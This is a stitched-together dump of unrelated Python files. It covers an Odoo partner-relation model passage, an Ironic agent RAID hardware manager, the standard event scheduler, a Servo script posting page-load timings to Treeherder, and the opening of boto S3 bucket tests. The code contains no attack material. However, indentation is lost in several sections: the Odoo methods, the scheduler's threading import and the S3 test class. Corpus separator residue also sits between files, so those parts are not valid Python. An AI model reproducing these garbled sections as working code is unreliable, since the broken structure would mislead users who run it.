        if vals.get('contact_type'):
            del vals['contact_type']
        return vals
@api.multi
def write(self, vals):
"""Override write to correct values, before being stored."""
vals = self._correct_vals(vals)
return super(ResPartnerRelation, self).write(vals)
@api.model
def create(self, vals):
"""Override create to correct values, before being stored."""
vals = self._correct_vals(vals)
return super(ResPartnerRelation, self).create(vals)
    def on_change_type_selection_id(
            self, cr, uid, dummy_ids, type_selection_id, context=None):
        '''Set domain on partner_id_display, when selection a relation type'''
        result = {
            'domain': {'partner_id_display': []},
            'value': {'type_id': False}
        }
        if not type_selection_id:
            # Nothing selected: clear the type and leave an open domain.
            return result
        prts_model = self.pool['res.partner.relation.type.selection']
        type_model = self.pool['res.partner.relation.type']
        # Decode the pseudo selection id into (real type id, reverse flag).
        (type_id, is_reverse) = (
            prts_model.get_type_from_selection_id(
                cr, uid, type_selection_id)
        )
        result['value']['type_id'] = type_id
        type_obj = type_model.browse(cr, uid, type_id, context=context)
        partner_domain = []
        # Restrictions apply to the side shown in partner_id_display:
        # the right side normally, the left side for a reverse type.
        check_contact_type = type_obj.contact_type_right
        check_partner_category = (
            type_obj.partner_category_right and
            type_obj.partner_category_right.id
        )
        if is_reverse:
            # partner_id_display is left partner
            check_contact_type = type_obj.contact_type_left
            check_partner_category = (
                type_obj.partner_category_left and
                type_obj.partner_category_left.id
            )
        # 'c' restricts to companies, 'p' to persons.
        if check_contact_type == 'c':
            partner_domain.append(('is_company', '=', True))
        if check_contact_type == 'p':
            partner_domain.append(('is_company', '=', False))
        if check_partner_category:
            partner_domain.append(
                ('category_id', 'child_of', check_partner_category))
        result['domain']['partner_id_display'] = partner_domain
        return result
@api.one
@api.constrains('date_start', 'date_end')
def _check_dates(self):
    """Ensure date_end, when both dates are set, is not before date_start.
    :raises exceptions.Warning: When constraint is violated
    """
    if not (self.date_start and self.date_end):
        # Open-ended relations are always fine.
        return
    if self.date_start > self.date_end:
        raise exceptions.Warning(
            _('The starting date cannot be after the ending date.')
        )
@api.one
@api.constrains('left_partner_id', 'type_id')
def _check_partner_type_left(self):
    """Validate the left partner against the type's company/person rule.
    :raises exceptions.Warning: When constraint is violated
    """
    self._check_partner_type('left')
@api.one
@api.constrains('right_partner_id', 'type_id')
def _check_partner_type_right(self):
    """Validate the right partner against the type's company/person rule.
    :raises exceptions.Warning: When constraint is violated
    """
    self._check_partner_type('right')
@api.one
def _check_partner_type(self, side):
    """Validate that the partner on one side matches the required kind.
    :param str side: either 'left' or 'right'
    :raises exceptions.Warning: When constraint is violated
    """
    assert side in ('left', 'right')
    required_type = getattr(self.type_id, 'contact_type_%s' % side)
    is_company = getattr(self, '%s_partner_id' % side).is_company
    mismatch = (
        (required_type == 'c' and not is_company) or
        (required_type == 'p' and is_company)
    )
    if mismatch:
        raise exceptions.Warning(
            _('The %s partner is not applicable for this relation type.') %
            side
        )
@api.one
@api.constrains('left_partner_id', 'right_partner_id')
def _check_not_with_self(self):
    """Disallow relating a partner to itself unless explicitly permitted.
    :raises exceptions.Warning: When constraint is violated
    """
    is_self_relation = self.left_partner_id == self.right_partner_id
    if is_self_relation and not self.allow_self:
        raise exceptions.Warning(
            _('Partners cannot have a relation with themselves.')
        )
@api.one
@api.constrains('left_partner_id', 'right_partner_id', 'active')
def _check_relation_uniqueness(self):
    """Forbid multiple active relations of the same type between the same
    partners
    :raises exceptions.Warning: When constraint is violated
    """
    if not self.active:
        # Archived relations never conflict with anything.
        return
    # Candidates: other active relations of the same type between the
    # exact same pair of partners.
    domain = [
        ('type_id', '=', self.type_id.id),
        ('active', '=', True),
        ('id', '!=', self.id),
        ('left_partner_id', '=', self.left_partner_id.id),
        ('right_partner_id', '=', self.right_partner_id.id),
    ]
    if self.date_start:
        # Keep candidates that are open-ended or end on/after our start
        # (i.e. whose period overlaps ours from the left).
        domain += ['|', ('date_end', '=', False),
                   ('date_end', '>=', self.date_start)]
    if self.date_end:
        # Keep candidates that are open-ended or start on/before our end
        # (i.e. whose period overlaps ours from the right).
        domain += ['|', ('date_start', '=', False),
                   ('date_start', '<=', self.date_end)]
    if self.search(domain):
        raise exceptions.Warning(
            _('There is already a similar relation with overlapping dates')
        )
def get_action_related_partners(self, cr, uid, ids, context=None):
'''return a window action showing a list of partners taking part in the
relations names by ids. Context key 'partner_relations_show_side'
determines if we show 'left' side, 'right' side or 'all' (default)
partners.
If active_model is res.partner.relation.all, left=this and
right=other'''
if context is None:
context = {}
field_names = {}
if context.get('active_model', self._name) == self._name:
field_names = {
'left': ['left'],
'right': ['right'],
'all': ['left', 'right']
}
elif context.get('active_model') == 'res.partner.relation.all':
field_names = {
'left': ['this'],
'right': ['other'],
'all': ['this', 'other']
}
else:
assert False, 'Unknown active_model!'
partner_ids = []
field_names = field_names[
context.get('partner_relations_show_side', 'all')]
field_names = ['%s_partner_id' % n for n in field_names]
for relation in self.pool[context.get('active_model')].read(
cr, uid, ids, context=context, load='_classic_write'):
for name in field_names:
partner_ids.append(relation[name])
return {
'name': _('Related partners'),
'type': 'ir.actions.act_window',
'res_model': 'res.partner',
'domain': [('id', 'in', partner_ids)],
'views': [(False, 'tree'), (False, 'form')],
'view_type': 'form'
} | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2016 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_log import log
from ironic_python_agent import hardware
from megautils.raid.adapter import Adapter
from megautils.raid_ircu.adapter import Adapter as SASAdapter
from megautils.raid.virtual_driver import VirtualDriver
from megautils.raid_ircu.virtual_driver import VirtualDriver as SASVirtualDriver
from megautils.raid.virtual_driver import validate_raid_schema
from megautils.raid.disk_allocator import allocate_disks
from megautils.raid_ircu.disk_allocator import allocate_disks as sas_allocate_disks
LOG = log.getLogger(__name__)
class MegaHardwareManager(hardware.GenericHardwareManager):
    """Hardware manager backed by LSI MegaRAID adapters (megautils.raid).

    Adds RAID inventory collection and RAID clean steps (create/delete
    configuration) on top of the generic IPA hardware manager.
    """

    HARDWARE_MANAGER_VERSION = "4"
    # Support level returned when a MegaRAID adapter is present; must be
    # higher than the generic manager's so this manager wins.
    LSI_RAID_PROVIDER = 4

    def evaluate_hardware_support(cls):
        """Report a vendor-specific support level when an adapter exists.

        NOTE(review): declared without @classmethod and with a ``cls``
        first argument, but called like an instance method (``cls`` is
        the instance at call time) -- confirm before renaming.

        :return: LSI_RAID_PROVIDER if any MegaRAID adapter is found,
            otherwise hardware.HardwareSupport.NONE
        """
        adapters = Adapter().get_adapters()
        return cls.LSI_RAID_PROVIDER if adapters else hardware.HardwareSupport.NONE

    def list_hardware_info(self):
        """Return full hardware inventory as a serializable dict.

        This inventory is sent to Ironic on lookup and to Inspector on
        inspection.

        :return: a dictionary representing inventory
        """
        hardware_info = {}
        hardware_info['interfaces'] = self.list_network_interfaces()
        hardware_info['cpu'] = self.get_cpus()
        hardware_info['disks'] = hardware.list_all_block_devices()
        # Extra field versus the generic manager: per-drive RAID inventory.
        hardware_info['physical_disks'] = self.list_all_physical_disks()
        hardware_info['memory'] = self.get_memory()
        hardware_info['bmc_address'] = self.get_bmc_address()
        hardware_info['system_vendor'] = self.get_system_vendor_info()
        hardware_info['boot'] = self.get_boot_info()
        return hardware_info

    def list_all_physical_disks(self):
        """Get all physical disks on the node, for disk allocation.

        :return: list of dicts, one per physical drive
        """
        adapters = Adapter().get_adapters()
        cache_physical_drivers = []
        for adapter in adapters:
            pds = adapter.get_physical_drivers()
            for pd in pds:
                cache_physical_drivers.append({
                    'size': pd.raw_size,
                    'type': pd.pd_type,
                    'enclosure': pd.enclosure,
                    # BUG FIX: 'slot' previously repeated pd.enclosure,
                    # which broke slot-based allocation. The SAS3 manager
                    # reports pd.slot here; mirror it (confirm megautils
                    # attribute name).
                    'slot': pd.slot,
                    'wwn': pd.wwn
                })
        return cache_physical_drivers

    def get_clean_steps(self, node, ports):
        """Return the clean steps supported by this hardware manager.

        Invoked on every hardware manager by Ironic Python Agent to pass
        this information back to Ironic.

        :param node: A dictionary of the node object
        :param ports: A list of dictionaries containing information of ports
            for the node
        :returns: A list of dictionaries, each item containing the step name,
            interface and priority for the clean step.
        """
        return [
            {'step': 'create_configuration',
             'interface': 'raid',
             'priority': 0},
            {'step': 'delete_configuration',
             'interface': 'raid',
             'priority': 1}
        ]

    def create_configuration(self, node, ports):
        """Create a RAID configuration on the baremetal node.

        :param node: ironic node object
        :param ports: ironic port objects
        :return: current raid configuration schema
        """
        LOG.info('creating configuration of node %s' % node['uuid'])
        target_raid_config = node.get('target_raid_config', {}).copy()
        LOG.debug('node raid config: %s' % target_raid_config)
        validate_raid_schema(target_raid_config)
        # Create fixed-size volumes first (largest first); 'MAX'-sized
        # volumes go last so they consume the leftover space.
        target_sorted_virtual_driver = (
            sorted((x for x in target_raid_config['logical_disks']
                    if x['size_gb'] != 'MAX'),
                   reverse=True,
                   key=lambda x: x['size_gb']) +
            [x for x in target_raid_config['logical_disks']
             if x['size_gb'] == 'MAX'])
        for target_virtual_driver in target_sorted_virtual_driver:
            adapter = target_virtual_driver.get('controller', 0)
            vd = VirtualDriver(adapter_id=adapter)
            count = target_virtual_driver.get('count', 1)
            for i in range(0, count):
                if 'physical_disks' not in target_virtual_driver:
                    # Mutates target_virtual_driver to pin concrete disks.
                    allocate_disks(adapter, target_virtual_driver)
                vd.create(target_virtual_driver['raid_level'],
                          target_virtual_driver['physical_disks'])
                # NOTE(review): 'is_root_volume' is read from the top-level
                # config here, though the Ironic schema defines it per
                # logical disk -- confirm intent.
                if target_raid_config.get('is_root_volume', False)\
                        and count == 1:
                    vd.set_boot_able()
        return target_raid_config

    def delete_configuration(self, node, ports):
        """Delete every RAID virtual drive on the baremetal node.

        :param node: ironic node object
        :param ports: ironic port objects
        :return: execute messages
        """
        adapters = Adapter().get_adapters()
        cache_virtual_drivers = []
        for adapter in adapters:
            cache_virtual_drivers += adapter.get_virtual_drivers()
        LOG.info('deleting virtual drivers')
        for virtual_driver in cache_virtual_drivers:
            LOG.debug('deleting virtual driver %s of adapter %s' %
                      (virtual_driver.id, virtual_driver.adapter))
            virtual_driver.destroy()
        return 'raid clean execution success'
class MegaSAS3HardwareManager(MegaHardwareManager):
    """Variant of MegaHardwareManager for SAS3 (sas3ircu) adapters.

    Same clean steps as the parent, but all adapter/virtual-drive access
    goes through megautils.raid_ircu instead of megautils.raid.
    """
    HARDWARE_MANAGER_VERSION = "5"
    # Higher support level than the MegaRAID manager, so this one wins
    # when a SAS3 adapter is present.
    LSI_RAID_PROVIDER = 5
    def evaluate_hardware_support(cls):
        # NOTE(review): like the parent, declared without @classmethod;
        # 'cls' is really the instance at call time -- confirm.
        adapters = SASAdapter().get_adapters()
        return cls.LSI_RAID_PROVIDER if adapters else hardware.HardwareSupport.NONE
    def list_all_physical_disks(self):
        """
        Get all physical disks to node for allocation
        :return: physical disk dict
        """
        adapters = SASAdapter().get_adapters()
        cache_physical_drivers = []
        for adapter in adapters:
            pds = adapter.get_physical_drivers()
            for pd in pds:
                # Field names differ from the MegaRAID driver (size vs
                # raw_size, guid vs wwn, ...), hence the full override.
                cache_physical_drivers.append({
                    'size': pd.size,
                    'type': pd.drive_type,
                    'enclosure': pd.enclosure,
                    'slot': pd.slot,
                    'wwn': pd.guid
                })
        return cache_physical_drivers
    def create_configuration(self, node, ports):
        """
        Create a Raid configuration to the baremetal node
        :param node: ironic node object
        :param ports: ironic port objects
        :return: current raid configuration schema
        """
        LOG.info('creating configuration of node %s' % node['uuid'])
        target_raid_config = node.get('target_raid_config', {}).copy()
        LOG.debug('node raid config: %s' % target_raid_config)
        validate_raid_schema(target_raid_config)
        # Fixed-size volumes first (largest first); 'MAX'-sized volumes
        # last so they consume the leftover space.
        target_sorted_virtual_driver = (
            sorted((x for x in target_raid_config['logical_disks']
                    if x['size_gb'] != 'MAX'),
                   reverse=True,
                   key=lambda x: x['size_gb']) +
            [x for x in target_raid_config['logical_disks']
             if x['size_gb'] == 'MAX'])
        for target_virtual_driver in target_sorted_virtual_driver:
            adapter = target_virtual_driver.get('controller', 0)
            vd = SASVirtualDriver(adapter_id=adapter)
            count = target_virtual_driver.get('count', 1)
            for i in range(0, count):
                if 'physical_disks' not in target_virtual_driver:
                    # Mutates target_virtual_driver to pin concrete disks.
                    sas_allocate_disks(adapter, target_virtual_driver)
                vd.create(target_virtual_driver['raid_level'],
                          target_virtual_driver['physical_disks'])
                # NOTE(review): 'is_root_volume' is read from the top-level
                # config, though the Ironic schema defines it per logical
                # disk -- confirm intent.
                if target_raid_config.get('is_root_volume', False)\
                        and count == 1:
                    vd.set_boot_able()
        return target_raid_config
    def delete_configuration(self, node, ports):
        """
        Delete all Raid configuration to the baremetal node
        :param node: ironic node object
        :param ports: ironic port objects
        :return: execute messages
        """
        adapters = SASAdapter().get_adapters()
        cache_virtual_drivers = []
        for adapter in adapters:
            cache_virtual_drivers += adapter.get_virtual_drivers()
        LOG.info('deleting virtual drivers')
        for virtual_driver in cache_virtual_drivers:
            LOG.debug('deleting virtual driver %s of adapter %s' %
                      (virtual_driver.id, virtual_driver.adapter))
            virtual_driver.destroy()
        return 'raid clean execution success'
"""A generally useful event scheduler class.
Each instance of this class manages its own queue.
No multi-threading is implied; you are supposed to hack that
yourself, or use a single instance per application.
Each instance is parametrized with two functions, one that is
supposed to return the current time, one that is supposed to
implement a delay. You can implement real-time scheduling by
substituting time and sleep from built-in module time, or you can
implement simulated time by writing your own functions. This can
also be used to integrate scheduling with STDWIN events; the delay
function is allowed to modify the queue. Time can be expressed as
integers or floating point numbers, as long as it is consistent.
Events are specified by tuples (time, priority, action, argument, kwargs).
As in UNIX, lower priority numbers mean higher priority; in this
way the queue can be maintained as a priority queue. Execution of the
event means calling the action function, passing it the argument
sequence in "argument" (remember that in Python, multiple function
arguments are be packed in a sequence) and keyword parameters in "kwargs".
The action function may be an instance method so it
has another way to reference private data (besides global variables).
"""
# XXX The timefunc and delayfunc should have been defined as methods
# XXX so you can define new kinds of schedulers using subclassing
# XXX instead of having to define a module or class just to hold
# XXX the global state of your particular time and delay functions.
import time
import heapq
from collections import namedtuple
try:
import threading
except ImportError:
import dummy_threading as threading
from time import monotonic as _time
__all__ = ["scheduler"]
class Event(namedtuple('Event', 'time, priority, action, argument, kwargs')):
    """A scheduled event. Ordering uses only (time, priority): earlier
    time wins, and a lower priority number wins ties — the callable and
    its arguments never take part in comparisons."""

    def _key(self):
        # Comparison key shared by all rich-comparison methods.
        return (self.time, self.priority)

    def __eq__(self, other):
        return self._key() == other._key()

    def __lt__(self, other):
        return self._key() < other._key()

    def __le__(self, other):
        return self._key() <= other._key()

    def __gt__(self, other):
        return self._key() > other._key()

    def __ge__(self, other):
        return self._key() >= other._key()
# Sentinel default for enterabs()/enter(): lets us hand every event a
# fresh kwargs dict instead of a shared mutable {} default.
_sentinel = object()


class scheduler:

    def __init__(self, timefunc=_time, delayfunc=time.sleep):
        """Initialize a new instance, passing the time and delay
        functions"""
        self._queue = []                # heap of Event tuples
        self._lock = threading.RLock()  # guards all access to _queue
        self.timefunc = timefunc
        self.delayfunc = delayfunc

    def enterabs(self, time, priority, action, argument=(), kwargs=_sentinel):
        """Enter a new event in the queue at an absolute time.
        Returns an ID for the event which can be used to remove it,
        if necessary.
        """
        if kwargs is _sentinel:
            kwargs = {}
        event = Event(time, priority, action, argument, kwargs)
        with self._lock:
            heapq.heappush(self._queue, event)
        return event # The ID

    def enter(self, delay, priority, action, argument=(), kwargs=_sentinel):
        """A variant that specifies the time as a relative time.
        This is actually the more commonly used interface.
        """
        time = self.timefunc() + delay
        return self.enterabs(time, priority, action, argument, kwargs)

    def cancel(self, event):
        """Remove an event from the queue.
        This must be presented the ID as returned by enter().
        If the event is not in the queue, this raises ValueError.
        """
        with self._lock:
            self._queue.remove(event)
            # remove() breaks the heap invariant; restore it.
            heapq.heapify(self._queue)

    def empty(self):
        """Check whether the queue is empty."""
        with self._lock:
            return not self._queue

    def run(self, blocking=True):
        """Execute events until the queue is empty.
        If blocking is False executes the scheduled events due to
        expire soonest (if any) and then return the deadline of the
        next scheduled call in the scheduler.
        When there is a positive delay until the first event, the
        delay function is called and the event is left in the queue;
        otherwise, the event is removed from the queue and executed
        (its action function is called, passing it the argument).  If
        the delay function returns prematurely, it is simply
        restarted.
        It is legal for both the delay function and the action
        function to modify the queue or to raise an exception;
        exceptions are not caught but the scheduler's state remains
        well-defined so run() may be called again.
        A questionable hack is added to allow other threads to run:
        just after an event is executed, a delay of 0 is executed, to
        avoid monopolizing the CPU when other threads are also
        runnable.
        """
        # localize variable access to minimize overhead
        # and to improve thread safety
        lock = self._lock
        q = self._queue
        delayfunc = self.delayfunc
        timefunc = self.timefunc
        pop = heapq.heappop
        while True:
            with lock:
                if not q:
                    break
                # Peek at the soonest event without removing it yet.
                time, priority, action, argument, kwargs = q[0]
                now = timefunc()
                if time > now:
                    delay = True
                else:
                    delay = False
                    # Due: pop while still holding the lock.
                    pop(q)
            if delay:
                if not blocking:
                    # Report when to come back instead of sleeping.
                    return time - now
                delayfunc(time - now)
            else:
                # Run the callback outside the lock so it may safely
                # re-enter the scheduler (enter/cancel).
                action(*argument, **kwargs)
                delayfunc(0)   # Let other threads run

    @property
    def queue(self):
        """An ordered list of upcoming events.
        Events are named tuples with fields for:
            time, priority, action, arguments, kwargs
        """
        # Use heapq to sort the queue rather than using 'sorted(self._queue)'.
        # With heapq, two events scheduled at the same time will show in
        # the actual order they would be retrieved.
        with self._lock:
            events = self._queue[:]
        return list(map(heapq.heappop, [events]*len(events)))
#!/usr/bin/env python3
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import argparse
from functools import partial, reduce
import json
import operator
import os
import random
import string
from thclient import (TreeherderClient, TreeherderResultSetCollection,
TreeherderJobCollection)
import time
from runner import format_result_summary
def geometric_mean(iterable):
    """Return the geometric mean of the strictly positive values in *iterable*.

    Non-positive values are ignored entirely (they would make the product
    meaningless for a geometric mean).
    """
    positives = [value for value in iterable if value > 0]
    product = reduce(operator.mul, positives)
    return product ** (1.0 / len(positives))
def format_testcase_name(name):
    """Turn a testcase URL into a short display name.

    Strips the known local-server prefixes, keeps only the first path
    segment, and caps the result at 80 characters.
    """
    stripped = name.replace('http://localhost:8000/page_load_test/', '')
    stripped = stripped.replace('http://localhost:8000/tp6/', '')
    first_segment = stripped.split('/')[0]
    return first_segment[:80]
def format_perf_data(perf_json, engine='servo'):
    """Convert raw runner timings into the Perfherder performance blob.

    :param perf_json: list of timing dicts, each holding absolute
        timestamps plus a 'testcase' URL
    :param engine: 'servo' (default) or 'gecko'; prefixes the suite name
    :return: dict shaped as Perfherder's ``performance_data`` payload
    """
    measurement = "domComplete"  # TODO: support a list of measurements

    def elapsed_since_nav_start(timings):
        # Timings are absolute; Perfherder wants them relative to
        # navigationStart.
        return timings[measurement] - timings['navigationStart']

    if engine == 'gecko':
        suite_name = 'gecko.{}'.format(measurement)
    else:
        suite_name = measurement
    suite = {
        "name": suite_name,
        "value": geometric_mean(elapsed_since_nav_start(t) for t in perf_json),
        "subtests": []
    }
    for testcase in perf_json:
        delta = elapsed_since_nav_start(testcase)
        suite["subtests"].append({
            "name": format_testcase_name(testcase["testcase"]),
            # A negative delta means a bogus timing (test timeout?);
            # report it as -1.
            "value": delta if delta >= 0 else -1
        })
    return {
        "performance_data": {
            # https://bugzilla.mozilla.org/show_bug.cgi?id=1271472
            "framework": {"name": "servo-perf"},
            "suites": [suite]
        }
    }
def create_resultset_collection(dataset):
    """Build a TreeherderResultSetCollection from a list of push dicts."""
    print("[DEBUG] ResultSet Collection:")
    print(dataset)
    collection = TreeherderResultSetCollection()
    for push in dataset:
        resultset = collection.get_resultset()
        resultset.add_push_timestamp(push['push_timestamp'])
        resultset.add_revision(push['revision'])
        resultset.add_author(push['author'])
        # TODO: figure out where type is used
        # resultset.add_type(push['type'])
        revisions = []
        for rev in push['revisions']:
            revision = resultset.get_revision()
            revision.add_revision(rev['revision'])
            revision.add_author(rev['author'])
            revision.add_comment(rev['comment'])
            revision.add_repository(rev['repository'])
            revisions.append(revision)
        resultset.add_revisions(revisions)
        collection.add(resultset)
    return collection
def create_job_collection(dataset):
    """Build a TreeherderJobCollection from a list of job dicts.

    Each entry must carry 'revision', 'project' and a nested 'job' dict
    with the fields referenced below (guid, names/symbols, timestamps,
    platform info, artifacts, ...).
    """
    print("[DEBUG] Job Collection:")
    print(dataset)
    tjc = TreeherderJobCollection()
    for data in dataset:
        tj = tjc.get_job()
        tj.add_revision(data['revision'])
        tj.add_project(data['project'])
        tj.add_coalesced_guid(data['job']['coalesced'])
        tj.add_job_guid(data['job']['job_guid'])
        tj.add_job_name(data['job']['name'])
        tj.add_job_symbol(data['job']['job_symbol'])
        tj.add_group_name(data['job']['group_name'])
        tj.add_group_symbol(data['job']['group_symbol'])
        tj.add_description(data['job']['desc'])
        tj.add_product_name(data['job']['product_name'])
        tj.add_state(data['job']['state'])
        tj.add_result(data['job']['result'])
        tj.add_reason(data['job']['reason'])
        tj.add_who(data['job']['who'])
        tj.add_tier(data['job']['tier'])
        tj.add_submit_timestamp(data['job']['submit_timestamp'])
        tj.add_start_timestamp(data['job']['start_timestamp'])
        tj.add_end_timestamp(data['job']['end_timestamp'])
        tj.add_machine(data['job']['machine'])
        tj.add_build_info(
            data['job']['build_platform']['os_name'],
            data['job']['build_platform']['platform'],
            data['job']['build_platform']['architecture']
        )
        tj.add_machine_info(
            data['job']['machine_platform']['os_name'],
            data['job']['machine_platform']['platform'],
            data['job']['machine_platform']['architecture']
        )
        tj.add_option_collection(data['job']['option_collection'])
        for artifact_data in data['job']['artifacts']:
            tj.add_artifact(
                artifact_data['name'],
                artifact_data['type'],
                artifact_data['blob']
            )
        tjc.add(tj)
    return tjc
# TODO: refactor this big function to smaller chunks
def submit(perf_data, failures, revision, summary, engine):
    """Push one resultset and one job (with perf artifacts) to Treeherder.

    Requires TREEHERDER_CLIENT_ID / TREEHERDER_CLIENT_SECRET in the
    environment.

    :param perf_data: Perfherder blob from format_perf_data()
    :param failures: testcases whose domComplete came back as -1
    :param revision: dict describing the servo commit under test
    :param summary: HTML result summary shown in the job-details pane
    :param engine: 'servo' or 'gecko'; selects job/group symbols
    """
    print("[DEBUG] failures:")
    print(list(map(lambda x: x['testcase'], failures)))
    author = "{} <{}>".format(revision['author']['name'],
                              revision['author']['email'])
    dataset = [
        {
            # The top-most revision in the list of commits for a push.
            'revision': revision['commit'],
            'author': author,
            'push_timestamp': int(revision['author']['timestamp']),
            'type': 'push',
            # a list of revisions associated with the resultset. There should
            # be at least one.
            'revisions': [
                {
                    'comment': revision['subject'],
                    'revision': revision['commit'],
                    'repository': 'servo',
                    'author': author
                }
            ]
        }
    ]
    trsc = create_resultset_collection(dataset)
    result = "success"
    # TODO: verify a failed test won't affect Perfherder visualization
    # if len(failures) > 0:
    #     result = "testfailed"
    # Random job guid with the same length as the commit hash.
    hashlen = len(revision['commit'])
    job_guid = ''.join(
        random.choice(string.ascii_letters + string.digits) for i in range(hashlen)
    )
    if (engine == "gecko"):
        project = "servo"
        job_symbol = 'PLG'
        group_symbol = 'SPG'
        group_name = 'Servo Perf on Gecko'
    else:
        project = "servo"
        job_symbol = 'PL'
        group_symbol = 'SP'
        group_name = 'Servo Perf'
    dataset = [
        {
            'project': project,
            'revision': revision['commit'],
            'job': {
                'job_guid': job_guid,
                'product_name': project,
                'reason': 'scheduler',
                # TODO: What is `who` for?
                'who': 'Servo',
                'desc': 'Servo Page Load Time Tests',
                'name': 'Servo Page Load Time',
                # The symbol representing the job displayed in
                # treeherder.allizom.org
                'job_symbol': job_symbol,
                # The symbol representing the job group in
                # treeherder.allizom.org
                'group_symbol': group_symbol,
                'group_name': group_name,
                # TODO: get the real timing from the test runner
                'submit_timestamp': str(int(time.time())),
                'start_timestamp': str(int(time.time())),
                'end_timestamp': str(int(time.time())),
                'state': 'completed',
                'result': result, # "success" or "testfailed"
                'machine': 'local-machine',
                # TODO: read platform from test result
                'build_platform': {
                    'platform': 'linux64',
                    'os_name': 'linux',
                    'architecture': 'x86_64'
                },
                'machine_platform': {
                    'platform': 'linux64',
                    'os_name': 'linux',
                    'architecture': 'x86_64'
                },
                'option_collection': {'opt': True},
                # jobs can belong to different tiers
                # setting the tier here will determine which tier the job
                # belongs to. However, if a job is set as Tier of 1, but
                # belongs to the Tier 2 profile on the server, it will still
                # be saved as Tier 2.
                'tier': 1,
                # the ``name`` of the log can be the default of "buildbot_text"
                # however, you can use a custom name. See below.
                # TODO: point this to the log when we have them uploaded to S3
                'log_references': [
                    {
                        'url': 'TBD',
                        'name': 'test log'
                    }
                ],
                # The artifact can contain any kind of structured data
                # associated with a test.
                'artifacts': [
                    {
                        'type': 'json',
                        'name': 'performance_data',
                        # TODO: include the job_guid when the runner actually
                        # generates one
                        # 'job_guid': job_guid,
                        'blob': perf_data
                    },
                    {
                        'type': 'json',
                        'name': 'Job Info',
                        # 'job_guid': job_guid,
                        "blob": {
                            "job_details": [
                                {
                                    "content_type": "raw_html",
                                    "title": "Result Summary",
                                    "value": summary
                                }
                            ]
                        }
                    }
                ],
                # List of job guids that were coalesced to this job
                'coalesced': []
            }
        }
    ]
    tjc = create_job_collection(dataset)
    # TODO: extract this read credential code out of this function.
    cred = {
        'client_id': os.environ['TREEHERDER_CLIENT_ID'],
        'secret': os.environ['TREEHERDER_CLIENT_SECRET']
    }
    client = TreeherderClient(server_url='https://treeherder.mozilla.org',
                              client_id=cred['client_id'],
                              secret=cred['secret'])
    # data structure validation is automatically performed here, if validation
    # fails a TreeherderClientError is raised
    client.post_collection('servo', trsc)
    client.post_collection('servo', tjc)
def main():
    """Command-line entry point: load the runner output and submit it."""
    parser = argparse.ArgumentParser(
        description=("Submit Servo performance data to Perfherder. "
                     "Remember to set your Treeherder credential as environment"
                     " variable 'TREEHERDER_CLIENT_ID' and "
                     "'TREEHERDER_CLIENT_SECRET'"))
    parser.add_argument("perf_json",
                        help="the output json from runner")
    parser.add_argument("revision_json",
                        help="the json containing the servo revision data")
    parser.add_argument("--engine",
                        type=str,
                        default='servo',
                        help=("The engine to run the tests on. Currently only"
                              " servo and gecko are supported."))
    args = parser.parse_args()

    def load_json(path):
        # Small helper: read and parse one JSON file.
        with open(path, 'r') as handle:
            return json.load(handle)

    result_json = load_json(args.perf_json)
    revision = load_json(args.revision_json)
    perf_data = format_perf_data(result_json, args.engine)
    # A domComplete of -1 marks a testcase flagged as failed upstream.
    failures = [case for case in result_json if case['domComplete'] == -1]
    summary = format_result_summary(result_json).replace('\n', '<br/>')
    submit(perf_data, failures, revision, summary, args.engine)
    print("Done!")
if __name__ == "__main__":
    main()
# -*- coding: utf-8 -*-
# Copyright (c) 2011 Mitch Garnaat http://garnaat.org/
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Some unit tests for the S3 Bucket
"""
from mock import patch, Mock
import unittest
import time
from boto.exception import S3ResponseError
from boto.s3.connection import S3Connection
from boto.s3.bucketlogging import BucketLogging
from boto.s3.lifecycle import Lifecycle
from boto.s3.lifecycle import Transition
from boto.s3.lifecycle import Expiration
from boto.s3.lifecycle import Rule
from boto.s3.acl import Grant
from boto.s3.tagging import Tags, TagSet
from boto.s3.website import RedirectLocation
from boto.compat import urllib
class S3BucketTest (unittest.TestCase):
s3 = True
def setUp(self):
    """Open a connection and create a uniquely named scratch bucket."""
    self.conn = S3Connection()
    self.bucket_name = 'bucket-{0:d}'.format(int(time.time()))
    self.bucket = self.conn.create_bucket(self.bucket_name)
def tearDown(self):
    """Delete every remaining key, then the scratch bucket itself."""
    for key in self.bucket.list():
        key.delete()
    self.bucket.delete()
def test_next_marker(self):
    """Delimited, truncated listings must expose NextMarker correctly."""
    expected = ["a/", "b", "c"]
    for key_name in expected:
        key = self.bucket.new_key(key_name)
        key.set_contents_from_string(key_name)
    # Normal list of first 2 keys will have
    # no NextMarker set, so we use last key to iterate
    # last element will be "b" so no issue.
    rs = self.bucket.get_all_keys(max_keys=2)
    for element in rs:
        pass
    self.assertEqual(element.name, "b")
    self.assertEqual(rs.next_marker, None)
    # list using delimiter of first 2 keys will have
    # a NextMarker set (when truncated). As prefixes
    # are grouped together at the end, we get "a/" as
    # last element, but luckily we have next_marker.
    rs = self.bucket.get_all_keys(max_keys=2, delimiter="/")
    for element in rs:
        pass
    self.assertEqual(element.name, "a/")
